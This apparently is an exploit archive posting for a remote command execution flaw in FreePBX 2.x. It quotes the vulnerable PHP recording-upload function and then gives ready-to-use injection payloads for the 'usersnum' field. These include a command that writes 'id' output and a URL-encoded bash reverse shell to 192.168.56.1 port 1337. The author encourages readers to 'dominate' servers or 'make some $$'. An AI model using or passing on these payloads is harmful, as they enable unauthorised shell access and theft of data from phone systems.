exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FreePBX 2.x Remote Command Execution

FreePBX 2.x Remote Command Execution
Posted Feb 24, 2014
Authored by i-Hmx

FreePBX versions before 2.3 suffer from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | 1b6ab5d6eea2edb5fba249fb2cfe50bfe3208ae7e99bf070ba3cfb23ec2b8e63

FreePBX 2.x Remote Command Execution

Change Mirror Download
App : Freepbx 2.x
Download : schmoozecom.net
Auther : i-Hmx
Mail : n0p1337@gmail.com
Home : security arrays inc. , sec4ever.com , exploit4arab.net

And again , while the distro is widely user , Schmoozecom staff not giving
it enough attention ,
all they provided for the distro is adding the schmoozecom fancy logo and
"Developed by schmoozecom" Teraraa :/
What ever,
Freepbx suffer from another command execution vuln , not so critical but
perhaps many people gonna be interested abt it
as it can be used to dump plaintext data from the PBX Box ;)

Vulnerable function "recording_addpage" @
admin/modules/recordings/page.recordings.php

function recording_addpage($usersnum) {
global $fc_save;
global $fc_check;
global $recordings_save_path;

?>
<div class="content">
<h2><?php echo _("System Recordings")?></h2>
<h3><?php echo _("Add Recording") ?></h3>
<h5><?php echo _("Step 1: Record or upload")?></h5>
<?php if (!empty($usersnum)) {
echo '<p>';
echo _("Using your phone,")."<a href=\"#\" class=\"info\">"._("
dial")."&nbsp;".$fc_save." <span>";
echo _("Start speaking at the tone. Press # when
finished.")."</span></a>";
echo _("and speak the message you wish to record. Press # when
finished.")."\n";
echo '</p>';
} else { ?>
<form name="xtnprompt" action="<?php $_SERVER['PHP_SELF'] ?>"
method="post">
<input type="hidden" name="display" value="recordings">
<?php
echo _("If you wish to make and verify recordings from your phone,
please enter your extension number here:"); ?>
<input type="text" size="6" name="usersnum" tabindex="<?php echo
++$tabindex;?>"> <input name="Submit" type="submit" value="<?php echo
_("Go"); ?>" tabindex="<?php echo ++$tabindex;?>">
</form>
<?php } ?>
<p></p>
<form enctype="multipart/form-data" name="upload" action="<?php echo
$_SERVER['PHP_SELF'] ?>" method="POST">
<?php echo _("Alternatively, upload a recording in any supported
asterisk format. Note that if you're using .wav, (eg, recorded with
Microsoft Recorder) the file <b>must</b> be PCM Encoded, 16 Bits, at
8000Hz")?>:<br>
<input type="hidden" name="display" value="recordings">
<input type="hidden" name="action" value="recordings_start">
<input type="hidden" name="usersnum" value="<?php echo
$usersnum ?>">
<input type="file" name="ivrfile" tabindex="<?php echo
++$tabindex;?>"/>
<input type="button" value="<?php echo _("Upload")?>"
onclick="document.upload.submit(upload);alert('<?php echo
addslashes(_("Please wait until the page reloads."))?>');" tabindex="<?php
echo ++$tabindex;?>"/>
</form>
<?php
if (isset($_FILES['ivrfile']['tmp_name']) &&
is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
if (empty($usersnum) || !ctype_digit($usersnum)) {
$dest = "unnumbered-";
} else {
$dest = "{$usersnum}-";
}
$suffix =
preg_replace('/[^0-9a-zA-Z]/','',substr(strrchr($_FILES['ivrfile']['name'],
"."), 1));
$destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
system("chgrp " . $amp_conf['AMPASTERISKGROUP'] . " " .
$destfilename);
system("chmod g+rw ".$destfilename);
echo "<h6>"._("Successfully uploaded")."
".$_FILES['ivrfile']['name']."</h6>";
$rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
} ?>
<form name="prompt" action="<?php $_SERVER['PHP_SELF'] ?>"
method="post" onsubmit="return rec_onsubmit();">
<input type="hidden" name="action" value="recorded">
<input type="hidden" name="display" value="recordings">
<input type="hidden" name="usersnum" value="<?php echo $usersnum ?>">
<?php
if (!empty($usersnum)) { ?>
<h5><?php echo _("Step 2: Verify")?></h5>
<p> <?php echo _("After recording or
uploading,")."&nbsp;<em>"._("dial")."&nbsp;".$fc_check."</em> "._("to
listen to your recording.")?> </p>
<p> <?php echo _("If you wish to re-record your message,
dial")."&nbsp;".$fc_save; ?></p>
<h5><?php echo _("Step 3: Name")?> </h5> <?php
} else {
echo "<h5>"._("Step 2: Name")."</h5>";
} ?>
<table style="text-align:right;">
<tr valign="top">
<td valign="top"><?php echo _("Name this Recording")?>: </td>
<td style="text-align:left"><input type="text" name="rname"
value="<?php echo $rname; ?>" tabindex="<?php echo ++$tabindex;?>"></td>
</tr>
</table>

<h6><?php
echo _("Click \"SAVE\" when you are satisfied with your recording");
echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n"; ?>
<input name="Submit" type="submit" value="<?php echo _("Save")?>"
tabindex="<?php echo ++$tabindex;?>"></h6>
<?php recordings_form_jscript(); ?>
</form>
</div>
<?php
}

Actually as you can see there are many exploitable lines there , but here
am interested about this line
system("chmod g+rw ".$destfilename);
if you traced the function flow you will notice that 'destfilename' get
part of his value from the parameter $_REQUEST['usersnum']
the function is called via
Target/admin/config.php?type=setup&display=recordings
before uploading open firebug
search for usersnum
edit value to
fa;id>faris;fax
or , for backconnetion use
fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris
and you are ready to dominate , or even make some $$ if you r interested ;)
Have a good day
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close